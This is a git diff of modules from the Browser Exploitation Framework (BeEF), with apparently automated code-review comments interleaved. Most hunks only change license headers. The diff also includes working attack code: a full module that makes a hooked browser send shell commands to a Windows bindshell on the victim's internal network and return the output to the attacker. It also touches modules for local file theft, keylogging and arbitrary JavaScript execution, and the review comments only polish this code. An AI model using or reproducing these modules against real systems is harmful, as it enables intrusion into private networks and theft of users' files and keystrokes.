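  // validate timeout: anything that is not a positive number falls back to 30 s
  var timeout = Number("<%= @timeout %>");
  if (!(timeout > 0)) timeout = 30;

  // … unchanged: createIframeIpecForm call and 'result=Shell commands sent' …

  // clean up without an implicit global or the string form of setTimeout
  setTimeout(function() {
    document.body.removeChild(win_ipec_form_<%= @command_id %>);
  }, timeout * 1000);
```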
@@ -0,0 +1,86 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// +// This is the old module which supports bi-directional communications for Firefox before version ~16 +beef.execute(function() { + + var target_ip = "<%= @ip %>"; + var target_port = "<%= @port %>"; + var cmd = "<%= @cmd %>"; + var timeout = "<%= @command_timeout %>"; + var internal_counter = 0; + + cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo
\"\" & echo
\"\""; + + var iframe = document.createElement("iframe"); + iframe.setAttribute("id","ipc_win_window_<%= @command_id %>"); + iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;"); + document.body.appendChild(iframe); + + function do_submit(ip, port, content) { + + var action = "http://" + ip + ":" + port + "/index.html?&cmd&"; + var parent = window.location.href; + + myform=document.createElement("form"); + myform.setAttribute("name","data"); + myform.setAttribute("method","post"); + myform.setAttribute("enctype","multipart/form-data"); + myform.setAttribute("action",action); + document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); + + myExt = document.createElement("INPUT"); + myExt.setAttribute("id",<%= @command_id %>); + myExt.setAttribute("name",<%= @command_id %>); + myExt.setAttribute("value",content); + myform.appendChild(myExt); + myExt = document.createElement("INPUT"); + myExt.setAttribute("id","endTag"); + myExt.setAttribute("name","
"); + myExt.setAttribute("value","echo window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);\"\" & exit"); + + myform.appendChild(myExt); + myform.submit(); + } + + function waituntilok() { + + try { + if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) { + ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href; + output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__')); + beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "
")).replace(//g, ">").replace(/<br>/gi, "
")); + document.body.removeChild(iframe); + return; + } else throw("command results haven't been returned yet"); + } catch (e) { + internal_counter++; + if (internal_counter > timeout) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds'); + document.body.removeChild(iframe); + return; + } + setTimeout(function() {waituntilok()},1000); + } + } + + // validate target host + if (!target_ip) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host'); + return; + } + + // validate target port + if (!target_port || target_port > 65535 || target_port < 0 || isNaN(target_port)) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port'); + return; + } + + // send commands + do_submit(target_ip, target_port, cmd); + waituntilok(); + +}); + diff --git a/modules/ipec/inter_protocol_win_bindshell/config.yaml b/modules/ipec/inter_protocol_win_bindshell/config.yaml index e49666a0a..3240851df 100644 --- a/modules/ipec/inter_protocol_win_bindshell/config.yaml +++ b/modules/ipec/inter_protocol_win_bindshell/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
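Review bot: `command.old.js` reads `@ip`, `@port`, `@cmd` and `@command_timeout`, but `module.rb` in this same commit renames the options to `rhost`, `rport`, `commands` and `timeout`, so if this file is ever swapped back in every template variable expands to an empty string and the `fail=invalid target host` check fires first. The header comment should record that dependency, e.g. `// NOTE: expects the pre-rename option names (ip, port, cmd, command_timeout); see module.rb`. The body also assigns `myform`, `myExt`, `ipc_result` and `output` without `var`, leaking them as globals into the hooked page; if the file is kept purely as a reference and is not loaded (I cannot see the module loader from here), a one-line comment saying so would make that explicit.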
@@ -19,8 +9,8 @@ beef: enable: true category: "IPEC" name: "Bindshell (Windows)" - description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet." + description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF.

Note: ampersands are required to seperate commands." authors: ["bcoles", "wade"] target: - working: ["FF"] - not_working: ["C", "S", "O", "IE"] + working: ["FF", "C"] + not_working: ["S", "O", "IE"] diff --git a/modules/ipec/inter_protocol_win_bindshell/module.rb b/modules/ipec/inter_protocol_win_bindshell/module.rb index c8b4e2565..7be2302e3 100644 --- a/modules/ipec/inter_protocol_win_bindshell/module.rb +++ b/modules/ipec/inter_protocol_win_bindshell/module.rb 
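Review bot: The new description ends with `Note: ampersands are required to seperate commands.` — "seperate" should be "separate"; the same misspelling is in the `commands` option description in `modules/ipec/inter_protocol_win_bindshell/module.rb` in this commit. Both strings are displayed in the UI, so the fix is `Note: ampersands are required to separate commands.` in each place.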
@@ -1,80 +1,31 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # =begin -[+] Summary: - -Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet. - -The command results are returned to the BeEF control panel. - -[+] Tested: - -o Working: - o Mozilla Firefox 4 - o Mozilla Firefox 5 - -o Not Working: - o Mozilla Firefox 5 with the NoScript extension - o Internet Explorer 8+ - o Chrome 13 - o Opera 11 - o Safari 5 - -[+] Notes: - -o The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue: - - o use the netcat persistent listen "-L" option rather than the listen "-l" option; or - - o remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system. 
- -o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning: - - [ABE] Deny on {POST http://localhost:4444/index.html?&cmd& <<< about:blank - 7} - SYSTEM rule: - Site LOCAL - Accept from LOCAL - Deny - -o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested. - -o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however. - -o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun. +The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue: + - use the netcat persistent listen "-L" option rather than the listen "-l" option; or + - remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system. +Returning the shell command results is not supported in Firefox ~16+, IE, Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe due to content-type restrictions. The shell commands are executed on the target shell however. =end class Inter_protocol_win_bindshell < BeEF::Core::Command def self.options return [ - {'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'}, - {'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'}, - {'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}, - {'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. 
Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' } + {'name'=>'rhost', 'ui_label'=>'Target Address', 'value'=>'127.0.0.1'}, + {'name'=>'rport', 'ui_label'=>'Target Port', 'value'=>'4444'}, + {'name'=>'timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}, + {'name'=>'commands','ui_label'=>'Shell Commands', 'description'=>'Enter shell commands to execute. Note: ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Path: & pwd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' } ] end def post_execute content = {} content['result'] = @datastore['result'] if not @datastore['result'].nil? - content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? - if content.empty? - content['fail'] = 'No data was returned.' - end + content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? save content end end diff --git a/modules/metasploit/browser_autopwn/command.js b/modules/metasploit/browser_autopwn/command.js index 11829cca4..9c3004143 100644 --- a/modules/metasploit/browser_autopwn/command.js +++ b/modules/metasploit/browser_autopwn/command.js 
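Review bot: The new default for `commands` inserts `echo Directory Path: & pwd` into a list that is otherwise cmd.exe syntax; `pwd` is not a cmd.exe built-in, so on a stock Windows target the default payload will produce a "not recognized" error in the shell output — either drop that element or state in the `=begin` block that the default assumes a shell providing `pwd`. `post_execute` also drops the `content['fail'] = 'No data was returned.'` fallback; with the new `command.js` every code path reports either `result=` or `fail=`, so that looks intentional, but a short comment such as `# command.js always sends result= or fail=, so no empty-content fallback is needed` would stop the next reader from re-adding it. The `=begin` text still says results are not returned "in Firefox ~16+, IE, Chrome, Safari and Opera", which implies they are returned elsewhere, while the shipped `command.js` never attempts to read results in any browser (only `command.old.js` does); the two should be aligned.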
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var sploit = beef.dom.createInvisibleIframe(); sploit.src = '<%= @sploit_url %>'; diff --git a/modules/metasploit/browser_autopwn/config.yaml b/modules/metasploit/browser_autopwn/config.yaml index f2d6c67ce..382184750 100644 --- a/modules/metasploit/browser_autopwn/config.yaml +++ b/modules/metasploit/browser_autopwn/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/metasploit/browser_autopwn/module.rb b/modules/metasploit/browser_autopwn/module.rb index 1cebf51ac..63a865176 100644 --- a/modules/metasploit/browser_autopwn/module.rb +++ b/modules/metasploit/browser_autopwn/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Browser_autopwn < BeEF::Core::Command diff --git a/modules/misc/google_search/command.js b/modules/misc/google_search/command.js index 93366a3d5..4b8918313 100644 --- a/modules/misc/google_search/command.js +++ b/modules/misc/google_search/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var query = '<%= @query.gsub(/'/, "\\'") %>'; diff --git a/modules/misc/google_search/config.yaml b/modules/misc/google_search/config.yaml index bc0cc6b8f..fbe897d02 100644 --- a/modules/misc/google_search/config.yaml +++ b/modules/misc/google_search/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/misc/google_search/module.rb b/modules/misc/google_search/module.rb index afec66958..830029367 100644 --- a/modules/misc/google_search/module.rb +++ b/modules/misc/google_search/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Google_search < BeEF::Core::Command diff --git a/modules/misc/iframe_keylogger/command.js b/modules/misc/iframe_keylogger/command.js index 7f1ed6fd1..d509f1517 100644 --- a/modules/misc/iframe_keylogger/command.js +++ b/modules/misc/iframe_keylogger/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { // logged keystrokes array diff --git a/modules/misc/iframe_keylogger/config.yaml b/modules/misc/iframe_keylogger/config.yaml index f65092754..78580a1c4 100644 --- a/modules/misc/iframe_keylogger/config.yaml +++ b/modules/misc/iframe_keylogger/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/misc/iframe_keylogger/module.rb b/modules/misc/iframe_keylogger/module.rb index 6156f8ecd..1f06dc176 100644 --- a/modules/misc/iframe_keylogger/module.rb +++ b/modules/misc/iframe_keylogger/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Iframe_keylogger < BeEF::Core::Command diff --git a/modules/misc/iframe_sniffer/command.js b/modules/misc/iframe_sniffer/command.js index 21e6987d5..65edd2462 100644 --- a/modules/misc/iframe_sniffer/command.js +++ b/modules/misc/iframe_sniffer/command.js 
@@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var inputURL = '<%= @inputUrl %>'; var anchorsToCheck = '<%= @anchorsToCheck %>'; @@ -33,7 +24,7 @@ beef.execute(function() { var leakyscript = document.createElement('script'); leakyscript.setAttribute('type', 'text/javascript'); - leakyscript.setAttribute('src', 'http://'+beef.net.host+':'+beef.net.port+'/leakyframe.js'); + leakyscript.setAttribute('src', beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/leakyframe.js'); var theparent = document.getElementsByTagName('head')[0]; theparent.insertBefore(leakyscript, theparent.firstChild); } diff --git a/modules/misc/iframe_sniffer/config.yaml b/modules/misc/iframe_sniffer/config.yaml index 61c796fa1..5401ad7bc 100644 --- a/modules/misc/iframe_sniffer/config.yaml +++ b/modules/misc/iframe_sniffer/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/misc/iframe_sniffer/module.rb b/modules/misc/iframe_sniffer/module.rb index 7af2804af..f98d27b01 100644 --- a/modules/misc/iframe_sniffer/module.rb +++ b/modules/misc/iframe_sniffer/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Iframe_sniffer < BeEF::Core::Command 
diff --git a/modules/misc/invisible_iframe/command.js b/modules/misc/invisible_iframe/command.js index a0763583c..3bc00a1ce 100644 --- a/modules/misc/invisible_iframe/command.js +++ b/modules/misc/invisible_iframe/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var target = "<%= @target %>"; diff --git a/modules/misc/invisible_iframe/config.yaml b/modules/misc/invisible_iframe/config.yaml index b391c048a..46502c69a 100644 --- a/modules/misc/invisible_iframe/config.yaml +++ b/modules/misc/invisible_iframe/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/misc/invisible_iframe/module.rb b/modules/misc/invisible_iframe/module.rb index 1bfb45b60..571185463 100644 --- a/modules/misc/invisible_iframe/module.rb +++ b/modules/misc/invisible_iframe/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Invisible_iframe < BeEF::Core::Command 
diff --git a/modules/misc/local_file_theft/command.js b/modules/misc/local_file_theft/command.js index 614cdc659..d0cd40942 100644 --- a/modules/misc/local_file_theft/command.js +++ b/modules/misc/local_file_theft/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // local_file_theft // // Shamelessly plagurised from kos.io/xsspwn @@ -228,9 +219,9 @@ result = ''; function grabFiles(dir,os){ tmpfile = {} for (i in fileList[os]['post']){ - console.log('dir = ' + dir); - console.log('fileList: ' + fileList[os]['post'][i]); - console.log(i); + beef.debug('dir = ' + dir); + beef.debug('fileList: ' + fileList[os]['post'][i]); + beef.debug(i); tmpfile[i] = new XMLHttpRequest() tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]); tmpfile[i].send(); @@ -238,7 +229,7 @@ result = ''; tmpfile[i].onreadystatechange=function(){ for (j in fileList[os]['post']){ if(tmpfile[j].readyState==4){ - console.log('new returned for: ' + j); + beef.debug('new returned for: ' + j); result = j +": "+ tmpfile[j].responseText; beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result); 
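Review bot: The new `beef.debug(i);` line logs a bare loop index with no label, unlike the two `beef.debug(...)` lines just above it; `beef.debug('index: ' + i);` or dropping the line reads better. On the surrounding context lines `tmpfile`, `i` and `j` are assigned without `var` and so leak as globals of the hooked page — not introduced by this commit, but worth fixing while these lines are being touched. `grabFiles` starts before the first hunk and its body continues past the second.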
diff --git a/modules/misc/local_file_theft/config.yaml b/modules/misc/local_file_theft/config.yaml index d6b2c0be4..18f07358f 100644 --- a/modules/misc/local_file_theft/config.yaml +++ b/modules/misc/local_file_theft/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # local_file_theft # diff --git a/modules/misc/local_file_theft/module.rb b/modules/misc/local_file_theft/module.rb index 20dd2a5a9..f1193eceb 100644 --- a/modules/misc/local_file_theft/module.rb +++ b/modules/misc/local_file_theft/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # local_file_theft # diff --git a/modules/misc/raw_javascript/command.js b/modules/misc/raw_javascript/command.js index 15ece6d01..4d990e076 100644 --- a/modules/misc/raw_javascript/command.js +++ b/modules/misc/raw_javascript/command.js 
@@ -1,33 +1,24 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -beef.execute(function() { - var result; - - try { - result = function() {<%= @cmd %>}(); - } catch(e) { - for(var n in e) - result+= n + " " + e[n] + "\n"; - } - - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); -}); - - - - - - +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var result; + + try { + result = function() {<%= @cmd %>}(); + } catch(e) { + for(var n in e) + result+= n + " " + e[n] + "\n"; + } + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); +}); + + + + + + diff --git a/modules/misc/raw_javascript/config.yaml b/modules/misc/raw_javascript/config.yaml index 3f9512332..50c5350fd 100644 --- a/modules/misc/raw_javascript/config.yaml +++ b/modules/misc/raw_javascript/config.yaml 
